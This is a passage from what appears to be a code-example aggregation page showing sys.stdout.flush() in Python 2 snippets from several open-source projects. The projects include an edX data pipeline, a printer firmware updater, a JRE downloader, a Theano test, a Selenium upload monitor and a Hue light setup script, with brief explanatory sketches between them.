    course_dir = course_id.replace('/','__')
    lfp = find_course_sql_dir(course_id, basedir, datedir, use_dataset_latest=use_dataset_latest)

    cdir = lfp
    print "Processing %s from files in %s" % (course_id, cdir)
    sys.stdout.flush()

    mypath = os.path.dirname(os.path.realpath(__file__))
    SCHEMA_FILE = '%s/schemas/schema_user_info_combo.json' % mypath
    
    the_dict_schema = schema2dict(json.loads(open(SCHEMA_FILE).read())['user_info_combo'])
    
    uic = defaultdict(dict)		# dict with key = user_id, and val = dict to be written out as JSON line
    
    def copy_elements(src, dest, fields, prefix="", skip_empty=False):
        for key in fields:
            if skip_empty and (not key in src):
                src[key] = None
            if src[key]=='NULL':
                continue
            if key=='course_id' and src[key].startswith('course-v1:'):
                # special handling for mangled "opaque keys" version of course_id, e.g. course-v1:MITx+6.00.2x_3+1T2015
                src[key] = src[key].split(':',1)[1].replace('+','/')
            dest[prefix + key] = src[key]
    
    def openfile(fn_in, mode='r', add_dir=True):
        if add_dir:
            fn = cdir / fn_in
        else:
            fn = fn_in
        if (not os.path.exists(fn)) and (not fn.endswith('.gz')):
            fn += ".gz"
        if mode=='r' and not os.path.exists(fn):
            newfn = convert_sql(fn)		# try converting from *.sql file, if that exists
            if not newfn:
                return None			# failure, no file found, return None
            fn = newfn
        if fn.endswith('.gz'):
            return gzip.GzipFile(fn, mode)
        return open(fn, mode)
    
    def tsv2csv(fn_in, fn_out):
        import csv
        fp = openfile(fn_out, 'w', add_dir=False)
        csvfp = csv.writer(fp)
        for line in openfile(fn_in, add_dir=False):
            csvfp.writerow(line[:-1].split('\t'))
        fp.close()
    
    def convert_sql(fnroot):
        '''
        Returns filename if suitable file exists or was created by conversion of tab separated values to comma separated values.
        Returns False otherwise.
        '''
        if fnroot.endswith('.gz'):
            fnroot = fnroot[:-3]
        if fnroot.endswith('.csv'):
            fnroot = fnroot[:-4]
        if os.path.exists(fnroot + ".csv"):
            return fnroot + ".csv"
        if os.path.exists(fnroot + ".csv.gz"):
            return fnroot + ".csv.gz"
        if os.path.exists(fnroot + ".sql") or os.path.exists(fnroot + ".sql.gz"):
            infn = fnroot + '.sql'
            outfn = fnroot + '.csv.gz'
            print "--> Converting %s to %s" % (infn, outfn)
            tsv2csv(infn, outfn)
            return outfn
        return False

    nusers = 0
    fields = ['username', 'email', 'is_staff', 'last_login', 'date_joined']
    for line in csv.DictReader(openfile('users.csv')):
        uid = int(line['id'])
        copy_elements(line, uic[uid], fields)
        uic[uid]['user_id'] = uid
        nusers += 1
        uic[uid]['y1_anomalous'] = None
    
    print "  %d users loaded from users.csv" % nusers

    fp = openfile('profiles.csv')
    if fp is None:
        print "--> Skipping profiles.csv, file does not exist"
    else:
        nprofiles = 0
        fields = ['name', 'language', 'location', 'meta', 'courseware', 
                  'gender', 'mailing_address', 'year_of_birth', 'level_of_education', 'goals', 
                  'allow_certificate', 'country', 'city']
        for line in csv.DictReader(fp):
            uid = int(line['user_id'])
            copy_elements(line, uic[uid], fields, prefix="profile_")
            nprofiles += 1
        print "  %d profiles loaded from profiles.csv" % nprofiles
    
    fp = openfile('enrollment.csv')
    if fp is None:
        print "--> Skipping enrollment.csv, file does not exist"
    else:
        nenrollments = 0
        fields = ['course_id', 'created', 'is_active', 'mode', ]
        for line in csv.DictReader(fp):
            uid = int(line['user_id'])
            copy_elements(line, uic[uid], fields, prefix="enrollment_")
            nenrollments += 1
        print "  %d enrollments loaded from enrollment.csv" % nenrollments
    
    # see if from_mongodb files are present for this course; if so, merge in that data
    mongodir = cdir.dirname() / 'from_mongodb'
    if mongodir.exists():
        print "--> %s exists, merging in users, profile, and enrollment data from mongodb" % mongodir
        sys.stdout.flush()
        fp = gzip.GzipFile(mongodir / "users.json.gz")
        fields = ['username', 'email', 'is_staff', 'last_login', 'date_joined']
        nadded = 0
        for line in fp:
            pdata = json.loads(line)
            uid = int(pdata['_id'])
            if not uid in uic:
                copy_elements(pdata, uic[uid], fields, skip_empty=True)
                uic[uid]['user_id'] = uid
                nadded += 1
        fp.close()
        print "  %d additional users loaded from %s/users.json.gz" % (nadded, mongodir)
                
        fp = gzip.GzipFile(mongodir / "profiles.json.gz")
        fields = ['name', 'language', 'location', 'meta', 'courseware', 
                  'gender', 'mailing_address', 'year_of_birth', 'level_of_education', 'goals', 
                  'allow_certificate', 'country', 'city']
        nadd_profiles = 0
        def fix_unicode(elem, fields):
            for k in fields:
                if (k in elem) and elem[k]:
                    elem[k] = elem[k].encode('utf8')

        for line in fp:
            pdata = json.loads(line.decode('utf8'))
            uid = int(pdata['user_id'])
            if not uic[uid].get('profile_name', None):
                copy_elements(pdata, uic[uid], fields, prefix="profile_", skip_empty=True)
                fix_unicode(uic[uid], ['profile_name', 'profile_mailing_address', 'profile_goals', 'profile_location', 'profile_language'])
                uic[uid]['y1_anomalous'] = 1
                nadd_profiles += 1
        fp.close()
        print "  %d additional profiles loaded from %s/profiles.json.gz" % (nadd_profiles, mongodir)
                
        # if datedir is specified, then do not add entries from mongodb where the enrollment happened after the datedir cutoff
        cutoff = None
        if datedir:
            cutoff = "%s 00:00:00" % datedir

        fp = gzip.GzipFile(mongodir / "enrollment.json.gz")
        fields = ['course_id', 'created', 'is_active', 'mode', ]
        nadd_enrollment = 0
        n_removed_after_cutoff = 0
        for line in fp:
            pdata = json.loads(line.decode('utf8'))
            uid = int(pdata['user_id'])
            if not uic[uid].get('enrollment_course_id', None):
                if cutoff and (pdata['created'] > cutoff) and (uic[uid].get('y1_anomalous')==1):	# remove if enrolled after datedir cutoff
                    uic.pop(uid)
                    n_removed_after_cutoff += 1
                else:
                    copy_elements(pdata, uic[uid], fields, prefix="enrollment_", skip_empty=True)
                    nadd_enrollment += 1
        fp.close()
        print "  %d additional enrollments loaded from %s/enrollment.json.gz" % (nadd_enrollment, mongodir)

        print "     from mongodb files, added %s (of %s) new users (%s profiles, %s enrollments, %s after cutoff %s)" % (nadded - n_removed_after_cutoff,
                                                                                                                         nadded, nadd_profiles, nadd_enrollment,
                                                                                                                         n_removed_after_cutoff,
                                                                                                                         cutoff)
        sys.stdout.flush()

    fp = openfile('certificates.csv')
    if fp is None:
        print "--> Skipping certificates.csv, file does not exist"
    else:
        for line in csv.DictReader(fp):
            uid = int(line['user_id'])
            fields = ['download_url', 'grade', 'course_id', 'key', 'distinction', 'status', 
                      'verify_uuid', 'download_uuid', 'name', 'created_date', 'modified_date', 'error_reason', 'mode',]
            copy_elements(line, uic[uid], fields, prefix="certificate_")
            if 'user_id' not in uic[uid]:
                uic[uid]['user_id'] = uid
    
    # sanity check for entries with user_id but missing username
    nmissing_uname = 0
    for uid, entry in uic.iteritems():
        if (not 'username' in entry) or (not entry['username']):
            nmissing_uname += 1
            if nmissing_uname < 10:
                print "missing username: %s" % entry
    print "--> %d entries missing username" % nmissing_uname
    sys.stdout.flush()
    
    # sanity check for entries missing course_id
    nmissing_cid = 0
    for uid, entry in uic.iteritems():
        if (not 'enrollment_course_id' in entry) or (not entry['enrollment_course_id']):
            nmissing_cid += 1
            entry['enrollment_course_id'] = course_id
    print "--> %d entries missing enrollment_course_id (all fixed by setting to %s)" % (nmissing_cid, course_id)
    sys.stdout.flush()

    fp = openfile('user_id_map.csv')
    if fp is None:
        print "--> Skipping user_id_map.csv, file does not exist"
    else:
        for line in csv.DictReader(fp):
            uid = int(line['id'])
            fields = ['hash_id']
            copy_elements(line, uic[uid], fields, prefix="id_map_")
    
    # sort by userid
    uidset = uic.keys()
    uidset.sort()
    
    # write out result, checking schema along the way
    
    fieldnames = the_dict_schema.keys()
    ofp = openfile('user_info_combo.json.gz', 'w')
    ocsv = csv.DictWriter(openfile('user_info_combo.csv.gz', 'w'), fieldnames=fieldnames)
    ocsv.writeheader()
    
    for uid in uidset:
        data = uic[uid]
        check_schema(uid, data, the_ds=the_dict_schema, coerce=True)
        if ('enrollment_course_id' not in data) and ('certificate_course_id' not in data):
            print "Oops!  missing course_id in user_info_combo line: inconsistent SQL?"
            print "data = %s" % data
            print "Suppressing this row"
            continue
        row_course_id = data.get('enrollment_course_id', data.get('certificate_course_id', ''))
        if not row_course_id==course_id:
            print "Oops!  course_id=%s in user_info_combo line: inconsistent with expected=%s" % (row_course_id, course_id)
            print "data = %s" % data
            print "Suppressing this row"
            continue
        ofp.write(json.dumps(data) + '\n')
        try:
            ocsv.writerow(data)
        except Exception as err:
            print "failed to write data=%s" % data
            raise
    
    print "Done with make_user_info_combo for %s" % course_id
    sys.stdout.flush()
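
The example above follows a common pattern: print a one-line summary after each loading stage and flush right away, so progress shows up in a redirected log while later stages are still running. A minimal, self-contained sketch of that pattern (run_stages and the lambdas are illustrative placeholders, not part of the edx2bigquery code):

import sys

def run_stages(stages):
    # stages: list of (label, callable) pairs; each callable does the work
    # for one input and returns how many records it added
    for label, stage in stages:
        count = stage()
        print("  %d records loaded from %s" % (count, label))
        sys.stdout.flush()  # push the summary out even when stdout is block-buffered

run_stages([("users.json.gz", lambda: 10),
            ("profiles.json.gz", lambda: 7)])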

Example 44

Project: oh-brother Source File: oh-brother.py
def update_firmware(cat, version):
  global password

  print 'Updating %s version %s' % (cat, version)

  # Build XML request info
  xml = ET.ElementTree(ET.fromstring(reqInfo))

  # At least for MFC-J4510DW M1405200717:EFAC (see Internet dumps)
  # and MFC-J4625DW, this element's value is *not* the per-firmware
  # cat[egory] value (which would be "FIRM" rather than "MAIN" in those
  # cases), but a *fixed* "MAIN" value, i.e. an unrelated item.
  # Sending the category here therefore appears to have been a bug for
  # every model (it triggers a failure response from the web service).
  #xml.find('FIRMUPDATETOOLINFO/FIRMCATEGORY').text = cat
  xml.find('FIRMUPDATETOOLINFO/FIRMCATEGORY').text = 'MAIN'

  modelInfo = xml.find('FIRMUPDATEINFO/MODELINFO')
  modelInfo.find('SELIALNO').text = serial
  modelInfo.find('NAME').text = model
  modelInfo.find('SPEC').text = spec

  firm = modelInfo.find('FIRMINFO/FIRM')
  ET.SubElement(firm, 'ID').text = cat
  ET.SubElement(firm, 'VERSION').text = version

  requestInfo = ET.tostring(xml.getroot(), encoding = 'utf8')

  if debug_dump_web_service_request_content:
    print 'request: %s' % requestInfo


  # Request firmware data
  url = 'https://firmverup.brother.co.jp/kne_bh7_update_nt_ssl/ifax2.asmx/' + \
      'fileUpdate'
  hdrs = {'Content-Type': 'text/xml'}

  print 'Looking up printer firmware info at vendor server...'
  sys.stdout.flush()

  import urllib2
  req = urllib2.Request(url, requestInfo, hdrs)
  response = urllib2.urlopen(req)
  response = response.read()

  print 'done'

  if debug_dump_web_service_response_content:
    print 'response: %s' % response

  # Parse response
  xml = ET.fromstring(response)

  if verbose: print_pretty(xml)

  # Check version
  versionCheck = xml.find('FIRMUPDATEINFO/VERSIONCHECK')
  if versionCheck is not None and versionCheck.text == '1':
    print 'Firmware already up to date'
    return


  # Get firmware URL
  firmwareURL = xml.find('FIRMUPDATEINFO/PATH')
  if firmwareURL is None:
    print 'No firmware update info path found'
    sys.exit(1)
  firmwareURL = firmwareURL.text
  filename = firmwareURL.split('/')[-1]


  # Download firmware
  f = open(filename, 'w')

  print 'Downloading firmware file %s from vendor server...' % filename
  sys.stdout.flush()

  req = urllib2.Request(firmwareURL)
  response = urllib2.urlopen(req)

  while True:
      block = response.read(102400)
      if not block: break
      f.write(block)
      sys.stdout.write('.')
      sys.stdout.flush()

  print 'done'
  f.close()

  if show_firmware_upgrade_safety_prompt:
    print 'About to upload the firmware to printer.'
    print 'This is a dangerous action since it is potentially destructive.'
    print 'Thus please double-check / review to ensure that:'
    print '- firmware file version is compatible with your hardware'
    print '- network connection is maximally reliable (strongly prefer wired connection to WLAN)'
    print '- power supply is maximally reliable (may be achieved by using a UPS)'
    raw_input("Press Ctrl-C to prevent firmware upgrade, or possibly Enter to continue...")

  # Get printer password
  if password is None:
    import getpass
    print
    password = getpass.getpass('Enter printer admin password: ')


  # Upload firmware to printer
  from ftplib import FTP

  print 'Now uploading firmware to printer (DO NOT REMOVE POWER!)...'
  sys.stdout.flush()

  ftp = FTP(ip, user = password) # Yes send password as user
  ftp.storbinary('STOR ' + filename, open(filename, 'r'))
  ftp.quit()

  print 'done'

  print
  print 'Wait for printer to finish updating and reboot before continuing.'
  raw_input("Press Enter to continue...")

Example 45

Project: nrvr-commander Source File: javaw.py
    @classmethod
    def now(cls,
            force=False,
            dontDownload=False,
            ticker=True):
        """Download file or use previously downloaded file.
        
        As implemented uses wget.
        That has been a choice of convenience, could be written in Python instead.
        
        force
            whether to force downloading even if apparently downloaded already.
            
            May be useful for programmatically updating at times.
        
        dontDownload
            whether you don't want to start a download, for some reason.
        
        Return file path."""
        simpleFilename = "jre-version-windows-arch.exe"
        downloadDir = ScriptUser.loggedIn.userHomeRelative("Downloads")
        downloadPath = os.path.join(downloadDir, simpleFilename)
        semaphorePath = downloadPath + cls.semaphoreExtenstion
        #
        if os.path.exists(downloadPath) and not force:
            if not os.path.exists(semaphorePath):
                # file exists and not download in progress,
                # assume it is good
                return downloadPath
            else:
                # file exists and download in progress,
                # presumably from another script running in another process or thread,
                # wait for it to complete
                printed = False
                ticked = False
                # check the essential condition, initially and then repeatedly
                while os.path.exists(semaphorePath):
                    if not printed:
                        # first time only printing
                        print "waiting for " + semaphorePath + " to go away on completion"
                        sys.stdout.flush()
                        printed = True
                    if ticker:
                        if not ticked:
                            # first time only printing
                            sys.stdout.write("[")
                        sys.stdout.write(".")
                        sys.stdout.flush()
                        ticked = True
                    time.sleep(5)
                if ticked:
                    # final printing
                    sys.stdout.write("]\n")
                    sys.stdout.flush()
        elif not dontDownload: # it is normal to download
            if not os.path.exists(downloadDir):
                try:
                    os.makedirs(downloadDir)
                except OSError:
                    if os.path.exists(downloadDir): # concurrently made
                        pass
                    else: # failure
                        raise
            #
            # try downloading
            pid = os.getpid()
            try:
                with open(semaphorePath, "w") as semaphoreFile:
                    # create semaphore file
                    semaphoreFile.write("pid=" + str(pid))
                #
                offlineInstallerUrl = cls._currentOfflineInstallerUrl()
                print "starting to download " + offlineInstallerUrl
                if ticker:
                    sys.stdout.write("[.")
                    sys.stdout.flush()
                try:
                    wget = CommandCapture(
                        ["wget",
                         "--quiet",
                         "-O", downloadPath,
                         offlineInstallerUrl],
                        forgoPty=True)
                    if ticker:
                        sys.stdout.write("]")
                        sys.stdout.flush()
                finally:
                    if ticker:
                        sys.stdout.write("\n")
                        sys.stdout.flush()
            except: # apparently a problem
                print "problem downloading " + downloadPath + " from " + offlineInstallerUrl
                raise
            else:
                print "done downloading " + downloadPath
            finally:
                try:
                    # delete semaphore file
                    os.remove(semaphorePath)
                except:
                    pass
        if os.path.exists(downloadPath):
            # file exists now, assume it is good
            return downloadPath
        else:
            # apparently download has failed
            raise IOError("file not found " + downloadPath)
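
The waiting branch above polls for a semaphore file and keeps the user informed with a bracketed ticker, flushing each dot because the line is never completed until the wait ends. A condensed sketch of just that idiom (wait_for_removal is an illustrative name, not part of nrvr-commander):

import os
import sys
import time

def wait_for_removal(path, interval=5):
    """Block until `path` disappears, printing a bracketed tick per poll."""
    ticked = False
    while os.path.exists(path):
        if not ticked:
            sys.stdout.write("[")
            ticked = True
        sys.stdout.write(".")
        sys.stdout.flush()  # keep the ticker visible while the line is still open
        time.sleep(interval)
    if ticked:
        sys.stdout.write("]\n")
        sys.stdout.flush()

# usage sketch: wait_for_removal("/tmp/some-download.exe.semaphore")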

Example 46

Project: attention-lvcsr Source File: test_rng_mrg.py
@attr('slow')
def test_normal0():

    steps = 50
    std = 2.
    if (mode in ['DEBUG_MODE', 'DebugMode', 'FAST_COMPILE'] or
            mode == 'Mode' and config.linker in ['py']):
        sample_size = (25, 30)
        default_rtol = .02
    else:
        sample_size = (999, 50)
        default_rtol = .01
    sample_size_odd = (sample_size[0], sample_size[1] - 1)
    x = tensor.matrix()

    for size, const_size, var_input, input, avg, rtol, std_tol in [
        (sample_size, sample_size, [], [], -5., default_rtol, default_rtol),
        (x.shape, sample_size, [x],
         [numpy.zeros(sample_size, dtype=config.floatX)],
         -5., default_rtol, default_rtol),
        ((x.shape[0], sample_size[1]), sample_size, [x],
         [numpy.zeros(sample_size, dtype=config.floatX)],
         -5., default_rtol, default_rtol),
        # test odd value
        (sample_size_odd, sample_size_odd, [], [], -5.,
         default_rtol, default_rtol),
        # test odd value
        (x.shape, sample_size_odd, [x],
         [numpy.zeros(sample_size_odd, dtype=config.floatX)],
         -5., default_rtol, default_rtol),
        (sample_size, sample_size, [], [],
         numpy.arange(numpy.prod(sample_size),
                      dtype='float32').reshape(sample_size),
         10. * std / numpy.sqrt(steps), default_rtol),
        # test empty size (scalar)
        ((), (), [], [], -5., default_rtol, 0.02),
        # test with few samples at the same time
        ((1,), (1,), [], [], -5., default_rtol, 0.02),
        ((2,), (2,), [], [], -5., default_rtol, 0.02),
        ((3,), (3,), [], [], -5., default_rtol, 0.02),
            ]:
        # print ''
        # print 'ON CPU:'

        R = MRG_RandomStreams(234, use_cuda=False)
        # Note: we specify `nstreams` to avoid a warning.
        n = R.normal(size=size, avg=avg, std=std,
                     nstreams=rng_mrg.guess_n_streams(size, warn=False))
        f = theano.function(var_input, n, mode=mode)
        # theano.printing.debugprint(f)
        out = f(*input)
        # print 'random?[:10]\n', out[0, 0:10]

        # Increase the number of steps if size implies only a few samples
        if numpy.prod(const_size) < 10:
            steps_ = steps * 50
        else:
            steps_ = steps
        basictest(f, steps_, const_size, target_avg=avg, target_std=std,
                  prefix='mrg ', allow_01=True, inputs=input,
                  mean_rtol=rtol, std_tol=std_tol)

        sys.stdout.flush()

        if mode != 'FAST_COMPILE' and cuda_available:
            # print ''
            # print 'ON GPU:'
            R = MRG_RandomStreams(234, use_cuda=True)
            n = R.normal(size=size, avg=avg, std=std, dtype='float32',
                         nstreams=rng_mrg.guess_n_streams(size, warn=False))
            # well, it's really that this test with the GPU doesn't make sense otherwise
            assert n.dtype == 'float32'
            f = theano.function(var_input, theano.Out(
                theano.sandbox.cuda.basic_ops.gpu_from_host(n),
                borrow=True), mode=mode_with_gpu)

            # theano.printing.debugprint(f)
            sys.stdout.flush()
            gpu_out = numpy.asarray(f(*input))
            # print 'random?[:10]\n', gpu_out[0, 0:10]
            # print '----'
            sys.stdout.flush()
            basictest(f, steps_, const_size, target_avg=avg, target_std=std,
                      prefix='gpu mrg ', allow_01=True, inputs=input,
                      mean_rtol=rtol, std_tol=std_tol)
            # Need to allow some rounding error, as there are float
            # computations that are done on the GPU vs. the CPU
            assert numpy.allclose(out, gpu_out, rtol=5e-6, atol=5e-6)

        # print ''
        # print 'ON CPU w NUMPY:'
        RR = theano.tensor.shared_randomstreams.RandomStreams(234)

        nn = RR.normal(size=size, avg=avg, std=std)
        ff = theano.function(var_input, nn)

        basictest(ff, steps_, const_size, target_avg=avg, target_std=std,
                  prefix='numpy ', allow_01=True, inputs=input, mean_rtol=rtol)
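
Here the flush calls separate long CPU and GPU test phases, so any output already printed is not lost if a later phase crashes or is killed. A minimal sketch of that bracketing, independent of Theano (timed_phase and the dummy workload are assumptions for illustration):

import sys
import time

def timed_phase(label, fn):
    """Run one long phase; flush before starting so the label is already
    on the terminal or in the log if the phase dies part-way through."""
    print("%s ..." % label)
    sys.stdout.flush()
    start = time.time()
    result = fn()
    print("%s done in %.1fs" % (label, time.time() - start))
    sys.stdout.flush()
    return result

timed_phase("cpu sampling", lambda: sum(range(10 ** 6)))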

Example 47

Project: CumulusCI Source File: package_upload_jenkins.py
    def build_package(self, build_name):
        """ Builds a managed package by calling SauceLabs via Selenium to click the Upload button """ 
        # Update Status
        print 'Starting browser'
        sys.stdout.flush()

        try:
            driver = self.get_selenium()
        except:
            print "Sleeping 5 more seconds to try again.  Last attempt to connect to Selenium failed"
            sleep(5)
            driver = self.get_selenium()

        driver.implicitly_wait(90) # seconds

        # Load the packages list page
        driver.get('%s/0A2' % self.instance_url)

        # Update Status
        print 'Loaded package listing page'
        sys.stdout.flush()

        # Click the link to the package
        driver.find_element_by_xpath("//th[contains(@class,'dataCell')]/a[text()='%s']" % self.package).click()

        # Update Status
        print 'Loaded package page'
        sys.stdout.flush()

        # Click the Upload button to open the upload form
        driver.find_element_by_xpath("//input[@class='btn' and @value='Upload']").click()

        # Update Status
        print 'Loaded Upload form'
        sys.stdout.flush()

        # Populate and submit the upload form to create a beta managed package
        name_input = driver.find_element_by_id('ExportPackagePage:UploadPackageForm:PackageDetailsPageBlock:PackageDetailsBlockSection:VersionInfoSectionItem:VersionText')
        name_input.clear()
        name_input.send_keys(build_name)
        driver.find_element_by_id('ExportPackagePage:UploadPackageForm:PackageDetailsPageBlock:PackageDetailsPageBlockButtons:bottom:upload').click()

        # Update Status
        print 'Upload Submitted'
        sys.stdout.flush()

        # Monitor the package upload progress
        retry_count = 0
        last_status = None
        while True:
            try:
                status_message = driver.find_element_by_css_selector('.messageText').text
            except selenium.common.exceptions.StaleElementReferenceException:
                # These come up, possibly if you catch the page in the middle of updating the text via javascript
                sleep(1)
                continue
            except selenium.common.exceptions.NoSuchElementException:
                # These come up, possibly if you catch the page in the middle of updating the text via javascript
                if retry_count > 15:
                    print ".messageText not found after 15 retries"
                    break
                sleep(1)
                retry_count += 1
                continue

            retry_count = 0

            if status_message.startswith('Upload Complete'):
                # Update Status
                print status_message
                sys.stdout.flush()
    
                # Get the version number and install url
                version = driver.find_element_by_xpath("//th[text()='Version Number']/following-sibling::td/span").text
                install_url = driver.find_element_by_xpath("//a[contains(@name, ':pkgInstallUrl')]").get_attribute('href')
            
                self.version = version
                self.install_url = install_url
    
                break

            if status_message.startswith('Upload Failed'):
                print status_message
                sys.stdout.flush()
                break 

            # Update Status
            if status_message != last_status:
                print status_message
                sys.stdout.flush()
            last_status = status_message

            sleep(1)

        driver.quit()    
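
The upload monitor above prints the status message only when it changes and flushes each time, which keeps a CI console (where stdout is usually a pipe, hence block-buffered) up to date during a long poll. A stripped-down sketch of that loop with the Selenium parts abstracted away (poll_status, read_status and is_done are hypothetical names):

import sys
import time

def poll_status(read_status, is_done, interval=1):
    """Poll a status source, printing only when the message changes."""
    last = None
    while True:
        message = read_status()
        if message != last:
            print(message)
            sys.stdout.flush()  # piped stdout is block-buffered; flush so logs update live
            last = message
        if is_done(message):
            return message
        time.sleep(interval)

# usage sketch with a canned sequence of messages:
messages = iter(["Upload in progress", "Upload in progress", "Upload Complete"])
poll_status(lambda: next(messages),
            lambda m: m.startswith("Upload Complete"),
            interval=0)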

Example 48

Project: LittleBits-Hue-Controller Source File: LittleBits-Hue-Controller.py
def setup():
    # Intro
    print ''
    print 'Welcome to the LittleBits Hue Controller Setup!'
    print 'This program is open source, so feel free to hack it.'
    print '(c) 2014 Jeremy Blum, Blum Idea Labs (www.jeremyblum.com)'

    print ''
    print 'Follow the prompts. If you need to change your setup in the future, just run this script in setup mode again.'
    print 'You can also manually edit the config file that this setup script will generate.'

    # Hue Hub IP Address
    print ''
    print 'We need to be able to communicate with your Hue lighting hub.'
    print 'If it\'s not already, consider setting your hub to a static IP, or a reserved DHCP IP address.'
    valid_IP = False
    hub_found = False
    while not valid_IP or not hub_found:
        ip = raw_input('Enter the IPv4 Address of your hub (ie. 192.168.0.150): ')
        if is_valid_ipv4(ip):
            valid_IP = True
            print 'Now, go press the "connect" button on the top of your hub'
            raw_input('Once you\'ve done that, hit enter.')
            print 'Searching for Hub at ' + ip + '...',
            sys.stdout.flush()
            try:
                bridge = Bridge(ip)
                bridge.connect()
            except:
                print 'Failed!'
                print 'A Hue Bridge could not be found at that address. Try again.'
            else:
                print 'Found!'
                hub_found = True
        else:
            print 'IP Address is invalid.'

    # Light Choice
    print ''
    print 'Now, we need to choose what lights this will control.'
    print 'Go apply power only to the lights you want this to control.'
    print 'Switch off, unplug, or unscrew Hue lights that you DON\'T want to control.'
    raw_input('Press enter once you\'ve done that...')
    print 'Allowing 10 seconds for the hue api to refresh...',
    sys.stdout.flush()
    time.sleep(10)
    print 'Done.'
    light_ids = hue_get_active_light_ids(bridge)
    light_names = hue_get_light_names(bridge, light_ids)
    group_id = hue_get_group_id(bridge, light_ids)
    print 'Great, lighting group ' + str(group_id) + ' has been added.'
    print 'We\'ll be controlling lights with these IDs/Names:'
    for light_id, light_name in zip(light_ids, light_names):
            print 'Light ID: ' + str(light_id) + ' - ' + light_name
    # TODO: Add some error checking (list length zero, for example)

    # Saving Config
    print ''
    print 'Writing setup info to config file...',
    sys.stdout.flush()
    with open(os.path.dirname(os.path.abspath(__file__)) + "/config.ini", 'w') as f:
            write_config_header(f)
            if not config.has_section('LittleBits'): config.add_section('LittleBits')
            if not config.has_option('LittleBits', 'baud_rate'): config.set('LittleBits', 'baud_rate', baud_rate)

            if not config.has_section('PhilipsHue'): config.add_section('PhilipsHue')
            config.set('PhilipsHue', 'bridge_ip', ip)
            config.set('PhilipsHue', 'group_id',  group_id)
            if not config.has_option('PhilipsHue', 'default_bri'):    config.set('PhilipsHue', 'default_bri',    default_bri)
            if not config.has_option('PhilipsHue', 'default_mood'):   config.set('PhilipsHue', 'default_mood',   default_mood)
            if not config.has_option('PhilipsHue', 'default_tt_sec'): config.set('PhilipsHue', 'default_tt_sec', default_tt_sec)

            if not config.has_section('HueMoods'): config.add_section('HueMoods')
            if not config.has_option('HueMoods', '0'): config.set('HueMoods', '0', mood0)
            if not config.has_option('HueMoods', '1'): config.set('HueMoods', '1', mood1)
            if not config.has_option('HueMoods', '2'): config.set('HueMoods', '2', mood2)
            if not config.has_option('HueMoods', '3'): config.set('HueMoods', '3', mood3)
            if not config.has_option('HueMoods', '4'): config.set('HueMoods', '4', mood4)
            if not config.has_option('HueMoods', '5'): config.set('HueMoods', '5', mood5)
            if not config.has_option('HueMoods', '6'): config.set('HueMoods', '6', mood6)
            if not config.has_option('HueMoods', '7'): config.set('HueMoods', '7', mood7)
            if not config.has_option('HueMoods', '8'): config.set('HueMoods', '8', mood8)
            if not config.has_option('HueMoods', '9'): config.set('HueMoods', '9', mood9)

            config.write(f)
    print 'Done!'

    # Make script run at system boot in background
    print ''
    print 'Setting up cron service to launch the service at boot...',
    sys.stdout.flush()
    cron = CronTab(user=True)
    cron.remove_all(comment='littlebits')
    cron_command = os.path.abspath(__file__)
    job = cron.new(command=cron_command,comment='littlebits')
    job.enable()
    job.every_reboot()
    cron.write()
    print 'Done!'

    print ''
    print 'Setup is now complete. The listening service will launch automatically at system boot.'
    print 'You can test it interactively now by running this script without the -s argument.'
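
Several prompts above use the Python 2 idiom of printing with a trailing comma, flushing, doing the slow work, and then finishing the same line with "Done." The flush is what makes the partial line appear before the slow step runs. A version of that idiom written with sys.stdout.write, which behaves the same on Python 2 and 3 (the step helper and the sleep stand-in are illustrative only):

import sys
import time

def step(message, action):
    """Print a message without a newline, flush it, run the action,
    then finish the same line with the outcome."""
    sys.stdout.write(message + " ")
    sys.stdout.flush()  # without the flush, the partial line may not appear until later
    try:
        action()
    except Exception:
        print("Failed!")
        raise
    print("Done.")

step("Writing setup info to config file...", lambda: time.sleep(0.1))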

Example 49

Project: pyscf Source File: icmpspt.py
def icmpspt(mc, pttype="NEVPT2", energyE0=0.0, rdmM=0, frozen=0, PTM=1000, PTincore=False, fciExtraLine=[], have3RDM=False, root=0, nroots=1, verbose=None, AAAVsplit=1):

    #remove the -1 state
    import os
    os.system("rm %s/node0/Rotation*.state-1.tmp"%(mc.fcisolver.scratchDirectory))
    os.system("rm %s/node0/wave*.-1.tmp"%(mc.fcisolver.scratchDirectory))

#    if type(mc.fcisolver) is not dmrgci.DMRGCI:
#        if (mc.fcisolver.fcibase_class is not dmrgci.DMRGCI):
#            print "this works with dmrgscf and not regular mcscf"
#            exit(0)

    if (pttype != "NEVPT2" and AAAVsplit != 1):
        print "AAAVsplit only works with CASSCF natural orbitals and NEVPT2"
        exit(0)

    mc.fcisolver.startM = 100
    mc.fcisolver.maxM = max(rdmM,501)
    mc.fcisolver.clearSchedule()
    mc.fcisolver.restart = False

    if (not have3RDM):
        mc.fcisolver.has_threepdm = False

        #we will redo the calculations, so let's get rid of the -1 states
        import os
        os.system("rm %s/node0/Rotation-*.state-1.tmp"%(mc.fcisolver.scratchDirectory))
        os.system("rm %s/node0/wave-*.-1.tmp"%(mc.fcisolver.scratchDirectory))
        os.system("rm %s/node0/RestartReorder.dat_1"%(mc.fcisolver.scratchDirectory))
    else:
        mc.fcisolver.has_threepdm = True

    mc.fcisolver.generate_schedule()
    mc.fcisolver.extraline = []
    if (PTincore):
        mc.fcisolver.extraline.append('do_npdm_in_core')
    mc.fcisolver.extraline += fciExtraLine


    if (len(mc.fcisolver.orbsym) == 0 and mc.fcisolver.mol.symmetry):
        mcscf.casci_symm.label_symmetry_(mc, mc.mo_coeff)
    ericas = mc.get_h2cas()
    h1e = reduce(numpy.dot, (mc.mo_coeff.T, mc.get_hcore(), mc.mo_coeff))
    dmcore = numpy.dot(mc.mo_coeff[:,:mc.ncore], mc.mo_coeff[:,:mc.ncore].T)*2
    vj, vk = mc._scf.get_jk(mc.mol, dmcore)
    vhfcore = reduce(numpy.dot, (mc.mo_coeff.T, vj-vk*0.5, mc.mo_coeff))
    h1effcas = h1e+vhfcore

    dmrgci.writeIntegralFile(mc.fcisolver, h1effcas[mc.ncore:mc.ncore+mc.ncas, mc.ncore:mc.ncore+mc.ncas], ericas, mc.ncas, mc.nelecas)

    dm1eff = numpy.zeros(shape=(mc.ncas, mc.ncas)) #this is the state average density which is needed in NEVPT2
 
    #loop over all states besides the current root
    if (pttype == "NEVPT2" and nroots>1):
        stateIter = range(nroots)
        stateIter.remove(root)
        for istate in stateIter:
            dm3 = mc.fcisolver.make_rdm3(state=istate, norb=mc.ncas, nelec=mc.nelecas, dt=float_precision)    
            nelec = mc.nelecas[0]+mc.nelecas[1]
            dm2 = numpy.einsum('ijklmk', dm3)/(nelec-2)
